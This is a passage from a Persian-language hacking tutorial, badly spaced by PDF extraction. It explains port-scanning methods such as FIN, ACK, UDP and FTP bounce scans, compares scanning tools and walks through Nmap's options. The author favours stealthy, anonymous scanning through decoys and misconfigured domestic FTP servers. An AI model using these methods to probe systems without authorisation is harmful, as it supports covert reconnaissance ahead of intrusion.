ﺕﺮﺕﻴ ﺐ وﻗﺘ ﯽ ﻣﺎﺷ ﻴﻦ ه ﺪف ی ﮏ دﻓﻌ ﻪ از ای ﻦ ﻧ ﻮع ﺏ ﺴﺘﻪ دریﺎﻓ ﺖ ﻣ ﯽ ﮐﻨ ﺪ ﭼ ﻮن ه ﻴﭻ در ﺧﻮاﺱﺘﯽ ﻧﻔﺮﺱﺘﺎدﻩ ﺏﻮدﻩ ﮐﻪ ﭼﻴﺰی ﺏﺨﻮاهﺪ ﺏﮕﻴﺮد ﺱﺮویﺲ دهﻨﺪﻩ ﺁن ﭘﻮرت ای ﻦ ﺏ ﺴﺘﻪ را ﺡ ﺬف ﻣﻴﮑﻨ ﺪ ﮐ ﻪ ﭘ ﺲ ﺏ ﺎ ای ﻦ روش دریﺎﻓ ﺖ ﻧﮑ ﺮدن ﺟ ﻮاب اﺡﺘﻤﺎﻻ ﻧﺘﻴﺠﻪ ﻣﻴﺪهﺪ ﮐﻪ ﭘﻮرت ﺏﺎز اﺱﺖ اﮔﺮ ﭘﻮرت ﺏﺴﺘﻪ ﺏﺎﺷﺪ یﮏ ﺏﺴﺘﻪ RESETﺏﺮای ﻧﺮم اﻓﺰار ﭘﻮیﺶ ﮐﻨﻨﺪﻩ ﻓﺮﺱ ﺘﺎدﻩ ﻣ ﯽ ﺷ ﻮد و ﻧ ﺮم اﻓ ﺰار ﺏ ﺎ دریﺎﻓﺖ ایﻦ ﺏﺴﺘﻪ ﭘﯽ ﻣﻴﺒﺮد ﮐﻪ ﭘﻮرت ﺏﺴﺘﻪ ﺷﺪﻩ اﺱﺖ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٨
ایﻦ ﻣﮑﺎﻧﻴﺰم ﺧ ﻮﺏﯽ اﺱ ﺖ ﭼ ﻮن ﻣ ﯽ ﺕ ﻮان ﺏ ﺎ ﺁن از ﻣ ﺴﻴﺮیﺎب ه ﺎی ﻓﻴﻠﺘ ﺮ ﮐﻨﻨ ﺪﻩ و دی ﻮار ﺁﺕ ﺶ ﻋﺒ ﻮر ﮐ ﺮد ،اﻣ ﺎ دو ﻣﮑ ﺎﻧﻴﺰم TCP SYS Scanو ﻣﮑﺎﻧﻴﺰم Polite Scanایﻦ اﻣﮑﺎن را ﻧﺪارﻧﺪ. -۵ﭘﻮیﺶ ﺏﻪ روش : FTP bounce Scan ایﻦ از ﺁن روﺷﻬﺎی اﺱﺖ ﮐﻪ ﺷﻤﺎ ﻧﺎﺷﻨﺎس ﻣﻴﻤﺎﻧﻴ ﺪ و ای ﻦ ﻣﻬ ﻢ اﻧﺠ ﺎم ﻧﻤ ﯽ ﺷ ﻮد ﻣﮕ ﺮ ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ از ﻗﺎﺏﻠﻴﺘﻬ ﺎی !! FTPدر ﺱ ﻮیﺲ FTPی ﮏ ﺱ ﺮی ﻗﺎﺏﻠﻴﺖ هﺎیﯽ اﺱﺖ ﮐﻪ ﺏﻪ ﺷﻤﺎ اﻣﮑﺎن ﻣﻴﺪهﺪ ﻣﺜﻼ ﺏﻪ ﺟﺎی ایﻨﮑ ﻪ از ی ﮏ ﺱ ﺮور ﻣ ﺴﺘﻘﻴﻤﺎ ﻓ ﺎیﻠﯽ دریﺎﻓ ﺖ ﮐﻨﻴ ﺪ ﺁن را ﺏ ﺮای ی ﮏ ﺱ ﺮور دیﮕ ﺮ ﺏﻔﺮﺱ ﺘﻴﺪ ﺧﻮب ایﻦ ﮐﺎر را ﺏﺮای ایﻦ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ﮐﻪ ایﻦ دو ﭼﻮن ﺱﺮﻋﺖ ایﻨﺘﺮﻧﺖ زیﺎدی دارﻧﺪ ﻓﻴﻞ زود ﺕﺮ ﺏﺎرﮔﻴﺮی ﻣﻴﺸﻮد و ﺏﻌﺪ ﺷﻤﺎ ﭘ ﻴﺶ ﺱ ﺮور دوﻣ ﯽ رﻓﺘﻪ و ﻓﺎیﻞ ﺧﻮد را روی CDﻣﻴﺮیﺰیﺪ و ﺏﻘﻴﻪ ﻣﺎﺟﺮا .ایﻨﻪ ﻣﮑﺎﻧﻴﺰم از ایﻦ اﺻﻞ اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ. در ایﻦ ﻣﮑﺎﻧﻴﺰم ﻧﺮم اﻓﺰار ﭘﻮیﺶ ﮔﺮ ﭘﻮرت یﮏ ارﺕﺒﺎط TCPﺏﺎ ﺱﺮویﺲ دهﻨﺪﻩ ) FTPایﻦ را هﻤﻴﻦ ﺟﺎ ﺏﮕﻮیﻢ ﺷﻤﺎ ﺏﺎیﺪ روی ﻣﺎﺷﻴﻦ هﺪف ﺏﺪاﻧﻴ ﺪ ایﻦ ﺱﺮویﺲ ﻓﻌﺎل ﭘﻮرت ٢١ﺏﺎز و یﺎ ...ﺕﺎ ایﻦ ﺷﻴﻮﻩ ﺏﻪ درﺱﺘﯽ ﮐ ﺎر ﮐﻨ ﺪ ( ﺏﺮﻗ ﺮار ﮐ ﺮدﻩ و از ﺁن ﻣﺎﺷ ﻴﻦ ﻣﻴﺨﻮاه ﺪ ﺏ ﺎ ی ﮏ ﭘ ﻮرت ﻣ ﺸﺨﺺ روی ﻣﺎﺷﻴﻦ هﺪف ارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﻨﺪ ) ایﻦ ﺱﺮویﺲ دهﻨﺪﻩ هﻢ ﻣﯽ ﺕﻮاﻧﺪ روی ﻣﺎﺷﻴﻦ ﭘﻮیﺸﮕﺮ ﭘﻮرت ﺏﺎﺷﺪ هﻢ ﻣﻴﺘﻮاﻧﺪ در یﮏ ﺟ ﺎی دیﮕ ﺮ از ﺷ ﺒﮑﻪ ﺏﺎﺷ ﺪ ( ﺧﻮب اﮔﺮ ارﺕﺒﺎط ﺏﺮﻗﺮار ﻧ ﺸﻮد و ﺱ ﺮویﺲ دهﻨ ﺪﻩ FTPﺏ ﻪ ﻧﺮﻣ ﺎﻓﺰار ﭘ ﻮیﺶ ﮔ ﺮ ﭘ ﻮرت اﻃ ﻼع ﻣﻴﺪه ﺪ ﭘ ﻮرت ﺏ ﺴﺘﻪ اﺱ ﺖ .ﭘ ﺲ ﺁن ﭘ ﻮرت روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ ﺏﺴﺘﻪ اﺱﺖ .اﻣﺎ اﮔﺮ ﭘﻮرت ﻣﺮﺏﻮﻃﻪ ﺏﺎز ﺏﺎﺷﺪ ،درﺁن ﻣﻮﻗﻊ هﻤﻴﺸﻪ یﮏ ﭘﺎﺱﺦ ﺏﺎ ایﻦ ﻣﻀﻤﻮم ﮐﻪ ﭘﻮرت ﺏﺎز اﺱﺖ اﻣﺎ اﻣﮑﺎن ﺕﺒﺎدل ﻓﺎیﻞ وﺟﺪ ﻧﺪارد دادﻩ ﻣﻴﺸﻮد .ﺧﻮب ﺏﺎز هﻢ ﺏﺎ دریﺎﻓﺖ ایﻦ ﻓﺎیﻞ ﭘﻮی ﺸﮕﺮ ﻣﻴﻔﻬﻤ ﺪ ﮐ ﻪ ﭘ ﻮرت ﺏ ﺎز اﺱ ﺖ .ای ﻦ روش ،روش ﮐ ﺎﻣﻼ ﻣﺨﻔﻴﺎﻧ ﻪ ای اﺱ ﺖ ﭼ ﻮن ﻣﺎﺷﻴﻦ هﺪف ﺏﺎ یﮏ ﻣﺎﺷﻴﻦ ﺙﺎﻟﺚ ارﺕﺒﺎط ﺏﺮﻗﺮار ﻣﯽ ﮐﻨﺪ ﻧﻪ ﺏﺎ ﻣﺎ. در ایﻦ روش هﻤﻴﺸﻪ ﺱﻌﯽ ﮐﻨﻴﺪ از ﺱﺮویﺲ دهﻨﺪﻩ هﺎی FTPوﻃﻨﯽ " هﻤﻴﺸﻪ " اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﭼﻮن ﻣﺎ از ﻗﺎﺏﻠﻴﺖ ای ﺏﻪ ﻧﺎم : File-Forwardingاﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﻴﻢ و در اﮐﺜﺮ اوﻗﺎت ایﻦ ﻗﺎﺏﻠﻴﺖ روی ﺱ ﺮورهﺎی وﻃﻨ ﯽ ﺏ ﻪ ﻋﻠ ﺖ ﻋ ﺪم داﻧ ﺶ ﮐ ﺎﻓﯽ ﻓﻌ ﺎل اﺱ ﺖ اﻣ ﺎ در ﺏ ﻴﺶ از %٩٠اوﻗﺎت روی ﺱﺮورهﺎی اروﭘﺎیﯽ و ﮐﺎﻧﺎدایﯽ و ﺁﻣﺮیﮑﺎیﯽ )ﺷﻴﻄﺎن ﺏﺰرگ!!!!! ﻧﻪ ﻣﮑﺰیﮏ و ﺏﺮزیﻞ و (...ﺏﻠﻮک ﺷﺪﻩ اﺱﺖ. -۶ﭘﻮیﺶ ﭘﻮرت هﺎی : udp ﮐﻼ ﭘﺮوﺕﮑﻞ udpرا ﺏﺪون اﺕﺼﺎل ﻣﯽ ﮔﻮیﻨﺪ یﻌﻨﯽ ﺷﻤﺎ هﻴﭻ ﮐﻨﺘﺮل و ...روی ﺏﺴﺘﻪ ﮐﻪ ﺡﻮاﻟﻪ ﻣﻴﮑﻨﻴﺪ ﺏﺮﺧﻼف tcpﻧﺪاریﺪ و ﺷﺎیﺪ ایﻦ ﺏ ﺴﺘﻪ در ی ﮏ ﺧﺮاﺏﻪ ایﯽ ،ﮔﻮر ﺏﻪ ﮔﻮر ﺷﻮد و یﺎ ﺷﺎیﺪ ﺕﺮﺕﻴﺐ دریﺎﻓﺖ ﺁﻧﻬﺎ ﺏﻪ هﻢ ﺏﺨﻮرد و... ایﻦ ﭘﺮوﺕﮑﻞ ﭼﻮن ﺧﻴﻠﯽ ﺱﺎدﻩ اﺱﺖ ﭘﺲ اﻣﮑﺎن اﺟﺮای ﺷﻴﻮﻩ و ﻣﺘﺪهﺎی ﮐﻤﯽ را ﻣﻴﺪهﺪ ﺏﻪ ﻣﺎ یﮑﯽ از ایﻦ ﺷﻴﻮﻩ هﺎ ایﻦ اﺱﺖ ﮐﻪ یﮏ ﺏ ﺴﺘﻪ udpﺏ ﺮای هﺪف ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد اﮔﺮ ﭘﺎﺱﺦ ICMP Port Unreachableدریﺎﻓﺖ ﺷﻮد ﭘﺲ ﺏ ﻪ ﻃ ﻮر یﻘ ﻴﻦ %١٠٠٠٠٠ﻣﻴ ﺸﻮد ﮔﻔ ﺖ ﭘ ﻮرت ﺏ ﺴﺘﻪ اﺱ ﺖ در ﻏﻴﺮ ایﻦ ﺻﻮرت ﻣﻴﺸﻮد ﻓﺮض ﮐﺮد ﭘﻮرت ﺏﺎز اﺱﺖ اﻟﺒﺘﻪ زیﺎد ﺟﺪی ﻧﻤﻴﺸﻮد ﮔﺮﻓﺖ ایﻦ را ﭼ ﻮن ﺷ ﺎیﺪ ﺏ ﺴﺘﻪ ﻧﺮﺱ ﻴﺪﻩ ﺏﺎﺷ ﺪ و ی ﺎ TTLﺁن ﺕﻤ ﺎم ﺷ ﺪﻩ ﺏﺎﺷﺪ و... هﻤﺎﻧﻄﻮر ﮐﻪ در ایﻦ ۶ﻣﮑﺎﻧﻴﺰم ﺏﻪ ﺷﻤﺎ ﺁﻣﻮزش دادم ﻧﻤﻴﺸﻮد ﮔﻔﺖ ﮐﻪ ﮐﺪام ﻣﮑﺎﻧﻴﺰم ﺏﻬﺘﺮ اﺱﺖ و ﺷﻤﺎ ﺏﺎیﺪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺷﺮایﻂ ﺧﻮد ﮐﻪ در ﻣﺮﺡﻠﻪ ﻗﺒﻞ ﭘﻴﺪا ﮐﺮدﻩ ایﺪ ﺕﺼﻤﻴﻢ ﺏﮕﻴﺮیﺪ ﮐﻪ ﺏﺎیﺪ از ﮐﺪام ﻣﮑﺎﻧﻴﺰم اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ .ﻣﺜﻼ ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ﻟﻴﻨﻮﮐﺲ و هﻢ ﺧﺎﻧﻮادﻩ هﺎی ﺁن ﮔﺰیﻨﻪ ﻧﻘﺾ اﺻ ﻮل ﭘﺮوﺕﮑﻞ ﺏﺪ ﻧﻴﺴﺖ ) ایﻦ یﺎدم رﻓﺘﻪ ﺏﮕﻢ ﻣﻦ ﻓﮑﺮ ﻣﻴﮑﻨﻢ روی ﻧﺴﺦ ﺟﺪیﺪ ایﻦ ﻧﻮع ﺱﻴﺴﺘﻤﻬﺎ ایﻦ ﻣﺸﮑﻞ ﺏﺮﻃﺮف ﺷﺪﻩ ( و یﺎ اﮔﺮ از ﻓﻴﻠﺘ ﺮ ﺷ ﺪن ﺏ ﺴﺘﻪ ه ﺎ ﮐﻼﻓ ﻪ ﺷ ﺪﻩ ای ﺪ ﻣﮑ ﺎﻧﻴﺰم TCP ACK Scanﮔﺰیﻨ ﻪ ﺧ ﻮﺏﯽ اﺱ ﺖ .اﮔ ﺮ ﻧﺎﺷ ﻨﺎس ﻣﺎﻧ ﺪن ﺡﮑ ﻢ ﻣ ﺮگ زﻧ ﺪﮔﯽ دارد اﺱﺘﻔﺎدﻩ از ﻣﮑﺎﻧﻴﺰم FTP bounce Scanو اﺱﺘﻔﺎدﻩ از یﮏ ﭘﺮو ﮐﺴﯽ ﮐﻪ ﺧﻮدﺕﺎن ﭘﻴﮑﺮ ﺏﻨﺪی ﮐﺮدﻩ ﺏﺎﺷﻴﺪ ﺁن را ﺕﻪ اﻣﻨﻴﺖ را ﺏﺮای ﺷﻤﺎ ﺏ ﻪ ارﻣﻐ ﺎن ﻣﯽ ﺁورد .اﮔﺮ در داﺧﻞ یﮏ ﺷﺒﮑﻪ داﺧﻠ ﯽ ه ﺴﺘﻴﺪ ﻣﮑ ﺎﻧﻴﺰم Polite Scanﺟ ﻮاب ه ﺎی %١٠٠درﺱ ﺖ و ﻗﺎﺏ ﻞ اﻃﻤﻴﻨ ﺎﻧﯽ را ﺏ ﻪ ﻣ ﺎ ﻣ ﯽ ده ﺪ .اﮔ ﺮ ﻣﺸﮑﻞ ﮐﻨﺪی دﺱﺖ رﺱﯽ ﺏﻪ ﺷﺒﮑﻪ و ﻧﮕﺮاﻧﯽ ﺷﻨﺎﺱﺎیﯽ داریﺪ ﮔﺰیﻨﻪ TCP SYN Scanاﻧﺘﺨﺎب ﻓﻮق اﻟﻌﺎدﻩ ایﯽ اﺱﺖ. ﻗﺒﻞ از هﺮ ﭼﻴﺰ یﮏ ﻣﻘﺎیﺴﻪ ﮐﻮﭼﻮﻟﻮ ﺏﻴﻦ ﻧﺮم اﻓﺰارهﺎی ﭘﻮیﺸﮕﺮ ﭘﻮرت ﻣﻌﺮوف اﻧﺠﺎم ﻣﻴﺪهﻢ ﺕﺎ ﺏﻌﺪ ﺏﺮﺱﯽ ﺏﻪ ﻣﻌﺮﻓﯽ ﺁﻧﻬﺎ: ﺕﻮاﻧﺎیﯽ ﭘﻮیﺶ ﭘﻮرت هﺎی TCP
ﺕﻮاﻧﺎیﯽ ﭘﻮیﺶ ﭘﻮرت هﺎی UDP
دارا ﺏﻮدن ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ
Җ Җ Җ Җ
-
Җ Җ Җ
Җ -
Җ Җ
Җ Җ
Җ -
ﻧﺎم ﻧﺮم اﻓﺰار ﭘﻮیﺶ ﮔﺮ ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﻤﻞ هﺎی UNIX Strobe Tcp_Scan Udp_Scan Nmap Netcat ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﻤﻞ هﺎی Windows NMapWin Net Scan Tools Pro
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !! Җ Җ Җ Җ Җ
-
Җ Җ
ﺻﻔﺤﻪ
٢٩
200x Super Scan NTO Scanner Win Scan Ip Eye WUPS Fscan
ﺧﻮب ﺡﺎل ﺏﻪ ﻣﻌﺮﻓﯽ ﮐﺎرا ﺕﺮیﻦ ﻧﺮم اﻓﺰارهﺎی ﭘﻮیﺸﮕﺮ ﭘﻮرت و اﻟﺒﺘﻪ ﮐﺎﻣﻞ ﺕﺮیﻦ ﻣﯽ ﭘﺮدازم: : Nmap -١ هﻴﭻ ﺟﺎی ﺏﺤﺜﯽ ﻧﻴﺴﺖ ﮐﻪ ایﻦ اوﻟﯽ اﺱﺖ ) ﺕﺎ ﺏﻪ ﺡﺎل ( .ﺕﻤﺎم ۶ﻣﮑﺎﻧﻴﺰم ﺏﺎﻻ را ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﯽ ﮐﻨﺪ اﻟﺒﺘﻪ ﺏﺎ دﻗﺖ ﺏﺎﻻ . ﺏﺮای دریﺎﻓﺖ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺁدرس زیﺮ ﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ : www.insecure.org/nmap ﺧﻮب ایﻦ هﻢ ﻣﺜﻞ ﺏﻘﻴﻪ اﺏﺰارهﺎ و روال هﻤﻴﺸﮕﯽ اول ﺏﺮای ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ﮐﺪ ﺏﺎز ﻧﻮﺷﺘﻪ ﺷﺪ ﺏﻌﺪ ﻧﻤﻮﻧﻪ ویﻨ ﺪوز ﺁن ه ﻢ ﺁﻣ ﺪ ﮐ ﻪ ﺧ ﺎﻟﯽ از اﺷ ﮑﺎل هﻢ ﻧﻴﺴﺖ ) روی xpهﺎی ﺱﺮویﺲ ﭘﮏ ١و ٢اﺟﺮا ﻧﻤﯽ ﺷﻮد ﺏﺎیﺪ ﺡﺘﻤﺎ ﺏ ﺪون ﺱ ﺮویﺲ ﭘ ﮏ ﺏﺎﺷ ﺪ ویﻨ ﺪوز Xpی ﺎ روی NTه ﺎ اﺟ ﺮا ﮐﻨﻴ ﺪ ﺁن را ﻣﺜﻼ ویﻨﺪوز ، ٢٠٠٠روی MEو ٩٨هﻢ اﺟﺮا ﻧﻤﯽ ﺷﻮد اﻟﺒﺘﻪ هﻨﻮز وﻗ ﺖ ﻧﮑ ﺮدم روی Advance SERVER 2003اﻣﺘﺤ ﺎن ﮐ ﻨﻢ ﺏﺒﻴ ﻨﻢ ﭼ ﻪ ﻣﻴﺸﻮد ﺟﻮاب ( ﺧﻮب ﻧﺴﺨﻪ ویﻨﺪوز ﺁن ورژن ١٫٣٫١ﺁﺧﺮیﻦ ﺁن هﺴﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ :
ایﻦ ﻓﺮاﻣﻮش ﮐﺮدم ﮐﻪ ﺏﮕﻮیﻢ ﺡﺘﻤﺎ ﻧﺮم اﻓﺰار Win Pcapرا ﺏﺎیﺪ ﻧﺼﺐ ﮐﻨﻴﺪ ﮐﻪ ﺁﺧﺮیﻦ ﻧﺴﺨﻪ ﺁن ٣اﺱﺖ ﺏﺮای اﺟﺮای ﻧﺴﺨﻪ ویﻨﺪوز ﺁن . ﻧ ﺴﺨﻪ ویﻨ ﺪوز ﺁن دارای دو ﻣ ﺪل اﺱ ﺖ ی ﮏ ﻣ ﺪل ﺕﺤ ﺖ ﺧ ﻂ ﻓﺮﻣ ﺎن ) ﻧ ﺴﺨﻪ هﻠ ﻮ ( و دیﮕ ﺮی دارای ی ﮏ راﺏ ﻂ ﮐ ﺎرﺏﺮی ﮔﺮاﻓﻴﮑ ﯽ اﺱ ﺖ ) ﺏ ﺎ ﻧ ﺎم .( NMapWinﺏﻪ ﻧﻈﺮ ﻣﻦ ﺕﻨﻬﺎ ﻣﺰیﺖ ﻧﺴﺨﻪ ﮔﺮاﻓﻴﮑﯽ ﺁن اﺱﺖ ﮐﻪ ﭘﻴﮑﺮ ﺏﻨﺪی را ﺏﺮای ﻣﺒﺘﺪی ه ﺎ ﺱ ﺎدﻩ ﻣﻴﮑﻨ ﺪ اﻟﺒﺘ ﻪ در ﭘ ﺎیﻴﻦ ﭘﻨﺠ ﺮﻩ ﻣﻌ ﺎدل ﭘﻴﮑ ﺮ ﺏﻨﺪی ﻧﺴﺨﻪ ﺧﻂ ﻓﺮﻣﺎن را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و ایﻦ ﻣﺰیﺖ اﺻﻠﯽ ﺁن اﺱﺖ !! ایﻦ هﻢ nmapدر ﺧﻂ ﻓﺮﻣﺎن ﮐﻪ ایﻦ ﺷﮑﻠﯽ اﺱﺖ : اول ﻣﻦ ﻣﺪل ﺧﻂ ﻓﺮﻣﺎن ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺏﻌﺪ ﻣﺪل ﮔﺮاﻓﻴﮑﯽ ﺁن راهﻤﺮاﻩ ﺧﻂ ﻓﺮﻣﺎن : C:\Program Files\NMapWin\bin>nmap.exe >Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣٠
* -sU UDP port scan )-sP ping scan (Find any reachable machines )* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only )-sR/-I RPC/Identd scan (use with other scan types Some Common Options (none are required, most can be combined): * -O Use TCP/IP fingerprinting to guess remote operating system '-p
ports to scan. Example range: '1-1024,1080,6666,31337 -F Only scans ports listed in nmap-services -v Verbose. Its use is recommended. Use twice for greater effect. )-P0 Don't ping hosts (needed to scan www.microsoft.com and others * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy ]-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve >-oN/-oX/-oG Output normal/XML/grepable scan logs to Get targets from file; Use '-' for stdin * -S /-e <devicename> Specify source address or network interface )--interactive Go into interactive mode (then press h for help --win_help Windows-specific features '*Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*. SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
در ﺟ ﺪول زی ﺮ ﺕﻤ ﺎم ﻣﮑﺎﻧﻴﺰﻣﻬ ﺎی ﭘ ﻮیﺶ ﭘ ﻮرت در ) ( nmapو ﺱ ﻮیﭻ ه ﺎی ﺁن در ﻧ ﺮم اﻓ ﺰار Nmapﺕﻮﺽ ﻴﺢ دادﻩ ﺷ ﺪﻩ اﺱ ﺖ .اﮔ ﺮ ﻣ ﯽ ﺏﻴﻨﻴ ﺪ ﺕﻮﺽﻴﺤﺎت ﮐﺎﻣﻞ ﻧﻴﺴﺖ ﺏﻪ ﺏﺨﺶ " اﻧﻮاع ﺷﻴﻮﻩ هﺎی ﺟﺴﺘﺠﻮی ﭘﻮرت " ﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ. ویﮋﮔﯽ و ﻣﺸﺨﺼﻪ ﭘﻮرت ١ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ !! ﺕﻤﺎم ﻣﺮاﺡﻞ ﭘﺎ ﺕﮑﺎﻧﯽ ﺏﺒﺨﺸﻴﺪ دﺱﺖ ﺕﮑﺎﻧﯽ اﻧﺠﺎم ﻣﯽ ﺷﻮد . ٢ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ !! دو ﻣﺮﺡﻠﻪ از ﺱﻪ ﻣﺮﺡﻠﻪ دﺱﺖ ﺕﮑﺎﻧﯽ ٣ﻣﺮﺡﻠﻪ ایﯽ اﻧﺠﺎم ﻣﻴﺸﻮد . ٣ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ TCP FINارﺱﺎل ﻣﻴﺸﻮد .اﮔﺮ RESETﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ۴ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ TCPﺏﺎ ﺏﻴﺘﻬﺎی ﻓﻌﺎل FINو URGو PUSHارﺱﺎل ﻣﻴﺸﻮد .اﮔﺮ RESETﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ۵ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ارﺱﺎل ﻣﯽ ﺷﻮد ﮐﻪ در ﺁن هﻴﭻ یﮏ از ﺏﻴﺘﻬﺎی ﮐﻨﺘﺮﻟﯽ ) ﻣﺜﻞ ACKو FINو ( ...ﻓﻌﺎل ﻧﻴﺴﺖ .اﮔﺮ RESETﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ۶ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ TCP ACKارﺱﺎل ﻣﯽ ﺷﻮد .اﮔﺮ RESETﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ٧ایﻦ ﻣﮑﺎﻧﻴﺰم ﻣﺸﺎﺏﻪ SYS ACKاﺱﺖ ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ ﻓﻴﻠﺪ Window Sizeدر ﺏﺴﺘﻪ TCPاﺱﺘﻔﺎدﻩ ﺷﺪﻩ اﺱﺖ. ٨ﻣﮑﺎﻧﻴﺰم ﺏﺎ ﺡﺎل FTP bounce Scanاﺱﺘﻔﺎدﻩ ﻣﯽ ﺷﻮد. ٩ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ UDPارﺱﺎل ﻣﻴﺸﻮد .اﮔﺮ RESETیﺎ ﭘﻴﻐﺎم ICMPﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ١٠ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ یﮏ ﻣﺎﺷﻴﻦ در ﺷﺒﮑﻪ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﭘﻴﻐﺎم . ICMP ١١ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ ﺱﺮویﺲ RPCدر ﺷﺒﮑﻪ ).ایﻦ ﻣﮑﺎﻧﻴﺰم } ﺧﻮدش از ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ { ﮐﻠﻴﻪ ﭘﻮرت هﺎی ﺏﺎز و ﺁﻣﺎدﻩ اﺱﺘﻔﺎدﻩ از ﺱﺮویﺲ RPCﮐﻪ اﺻﻄﻼﺡﺎ port mapperرا ﺏﻌﻼوﻩ اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ ﺁﺷﮑﺎر ﻣﻴﮑﻨﺪ (
ﺱﻮیﭻ هﺎ ) در ﺧﻂ ﻓﺮﻣﺎن ( -sT -sS
ﻧﺎم ﻣﺪل اﺱﮑﻦ ﺏﻪ ﻻﺕﻴﻦ TCP Connect TCP SYS
-sF
TCP FIN
-sX
TCP Xmas tree
-sN
Null
-sA
TCP ACK
-sW
Window
-b -sU
FTP Bounce UDP Scanning Ping RPC Scanning
-sP -sR
ﺧﻮب یﮑﯽ از ویﮋﮔﯽ هﺎی ﺧﻮب nmapﻣﮑﺎﻧﻴﺰم رد ﮔ ﻢ ﮐﻨ ﯽ ﺧ ﺎص ﺧ ﻮد اﺱ ﺖ ﮐ ﻪ ﺟ ﺪا از ﻣﮑ ﺎﻧﻴﺰم ه ﺎی ﭘ ﻮیﺶ ﻣﺨﻔ ﯽ ﭘ ﻮرت اﺱ ﺖ .ای ﻦ روش راﺏﻄﻪ ﻣﺴﺘﻘﻴﻤﯽ ﺏﺎ ﭘﻬﻨﺎی ﺏﺎﻧﺪ ارﺕﺒﺎﻃﯽ ﺷﻤﺎ ﺏﺎ ﺷﺒﮑﻪ دارد .ﻣﮑ ﺎﻧﻴﺰم ای ﻦ روش ای ﻦ اﺱ ﺖ ﮐ ﻪ ﺏ ﺮای ه ﺮ ﭘ ﻮرت از ﻣﺎﺷ ﻴﻦ ه ﺪف ﺏ ﻴﺶ از ی ﮏ ﺏ ﺴﺘﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﮐﻪ ﻓﻘﻂ در ﻓﻴﻠﺪ IPﻓﺮ ﺱﻨﺪﻩ ﺏﺎ هﻢ ﺕﻔﺎوت دارﻧﺪ ﺏﻪ ایﻦ ﺻ ﻮرت ﮐ ﻪ ﻣﺎﺷ ﻴﻦ ﻗﺮﺏ 